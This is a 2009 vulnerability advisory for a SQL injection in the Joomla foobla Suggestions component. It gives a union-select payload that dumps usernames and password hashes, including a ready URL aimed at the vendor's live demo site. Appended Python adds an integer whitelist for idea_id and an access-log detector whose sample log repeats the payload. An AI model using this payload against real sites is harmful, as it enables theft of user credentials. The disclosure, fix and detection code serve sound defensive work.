The Joomla Foobla Suggestions component remote SQL injection

2009-09-18 / 2009-09-19
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

-----------------------------------------------------------------------------------------
joomla component com_foobla_suggestions (idea_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------

Author       : Chip D3 Bi0s
Email        : chipdebios[alt+64]gmail.com
Date         : 15 September 2009
Critical Lvl : Moderate
Impact       : Exposure of sensitive information
Where        : From Remote

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : foobla Suggestions
Version     : 1.5.11
Developer   : foobla
License     : GPL
Type        : Commercial
Date Added  : 15 September 2009
Demo        : http://demo.foobla.com/foobla-suggestions-joomla/
Download    : http://foobla.com/products/featured-joomla-extensions/foobla-suggestions-for-joomla.html
Description : Have you ever used Uservoice? Would you like to have something similar on Joomla but with unlimited features and no monthly fee? The foobla Suggestions allows you to collect ideas, suggestions, and votes from your customers.

---------------------------------------------------------------------------

I. SQL injection (idea_id)

Poc/Exploit:
~~~~~~~~~~~~
http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]

[Sqlinjection]= null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users

Demo Live:
~~~~~~~~~~
http://demo.foobla.com/foobla-suggestions-joomla/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
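The root cause described above is an idea_id parameter that reaches the database query without being forced to an integer. As an added example (not part of the advisory and not the foobla component's own code), the following Python shows the check that closes this class of bug, a strict integer whitelist on idea_id, and a small detector that applies the same check to web-server access-log lines so that requests which would have reached the vulnerable query can be surfaced. The log lines, client IPs and timestamps are constructed for the example; the option, controller and idea_id parameter names are taken from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format). Hosts, IPs and
# timestamps are made up; the third line carries the idea_id payload shape
# quoted in the advisory, the fourth a single-quote probe.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2009:10:01:12 +0000] "GET /index.php?option=com_foobla_suggestions&controller=comment&idea_id=42 HTTP/1.1" 200 5120
10.0.0.6 - - [18/Sep/2009:10:02:40 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 8811
10.0.0.7 - - [18/Sep/2009:10:03:05 +0000] "GET /index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users HTTP/1.1" 200 9304
10.0.0.8 - - [18/Sep/2009:10:04:19 +0000] "GET /index.php?option=com_foobla_suggestions&controller=comment&idea_id=42%27 HTTP/1.1" 500 231
"""

# Pulls the request line ("GET /path?query HTTP/1.1") out of a log record.
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Only plain ASCII decimal digits are accepted; str.isdigit() is deliberately
# avoided because it also accepts Unicode digit forms that int() may reject.
_INT_RE = re.compile(r"[0-9]+")


def validate_idea_id(raw):
    """Return idea_id as an int when it is strictly a non-negative decimal
    integer, otherwise None.

    This is the whitelist the vulnerable component lacked: anything that is
    not a run of digits (quotes, spaces, 'null', 'union', ...) is rejected
    before it can be concatenated into SQL. It is the Python equivalent of
    casting the parameter with (int)/intval in PHP, or of fetching it with
    an integer-typed request accessor.
    """
    if raw is None:
        return None
    raw = raw.strip()
    if not _INT_RE.fullmatch(raw):
        return None
    return int(raw)


def flagged_requests(log_text):
    """Scan access-log text and return (client_ip, decoded_idea_id) for each
    request to com_foobla_suggestions whose idea_id fails validate_idea_id.

    Requests to other components are ignored, so the detector reports only
    input that the vulnerable code path would have consumed.
    """
    hits = []
    for line in log_text.splitlines():
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs URL-decodes values, so '+' and %27 are normalised before
        # the check, the same view of the data the application would see.
        query = parse_qs(urlsplit(match.group("target")).query,
                         keep_blank_values=True)
        if query.get("option", [""])[0] != "com_foobla_suggestions":
            continue
        raw = query.get("idea_id", [None])[0]
        if raw is not None and validate_idea_id(raw) is None:
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, raw))
    return hits


if __name__ == "__main__":
    for ip, value in flagged_requests(SAMPLE_LOG):
        print(f"{ip}: non-integer idea_id rejected -> {value!r}")
```

Run against the constructed log, the first request (idea_id=42) passes and is not reported, the com_content request is skipped because it is a different component, and the two remaining com_foobla_suggestions requests are flagged. The same validate_idea_id rule applied at request-handling time is the fix; applied to logs it becomes a retrospective check for whether such input was ever presented to the component.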

